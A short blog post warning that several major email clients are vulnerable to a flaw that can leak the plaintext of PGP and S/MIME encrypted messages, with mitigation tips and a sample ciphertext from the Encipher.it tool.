Warning: PGP Fail in Major Email Readers

PGPJust yesterday I released a video discussing the merits of using Encpher.it mainly because your system will not become littered with PGP/GPG keys and keyring files that would result in much deeper forensic scrutiny and/or cipher compromise if an adversary ever comes into possession or remote control of your phone/notebook/computer.

 

Today, Ars Technica publishes a story relating how Outlook, MacOS Mail, Apple Airmail and Thunderbird - some of the most-used email readers on the planet - are vulnerable to a PGP and S/MIME fail that would reveal the cleartext (the original unencrypted text) of your encrypted email to an attacker.  Even Proton Mail, Horde, and Postbox are affected.

See the article at Ars for the full list tested. 

The attack requires you to reply (or simply start a reply, even without sending) to an incoming email in reply to en encrypted email that you sent.  Thus an attacker with access to your email inbox could produce all the decrypts of various messages he/she desires.

For those of you who need to know right away and can't abandon a PGP channel with your email reader, you may be able to mitigate the risk considerably by simply switching from HTML email to plain text emails, IF you are certain that nobody has access via login or API to your email inbox. Also, do not reply to any incoming emails that reference a previous encrypted communication.  Start a new email to that person instead.

Best practice would be to abandon that 'secure' channel altogether until the vulnerabilities are patched.  Thunderbird has already committed to their code base (but not yet distributed) an update, but we're still waiting on initial responses from Apple and Microsoft. 

Best bet: Use a secure voice call in Signal to devise a long, complicated key and use Encipher.it to encrypt/decrypt your sensitive traffic.  Try to think of a method to 'calculate' a key rather than discuss or give the actual key - even in conversation.  Simple example: if you use the full web address that bitl.ly/ronzkey takes you to, use the full resulting web address as your key (never email this sort of information!).  Try that on the ciphertext below, just for fun.

Stay safe out there.

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
V0GMUa5YYUiR/plqYZgIwWDh97mRFIwEmS

Decrypt it at https://encipher.it

Be the first to comment

Please check your e-mail for a link to activate your account.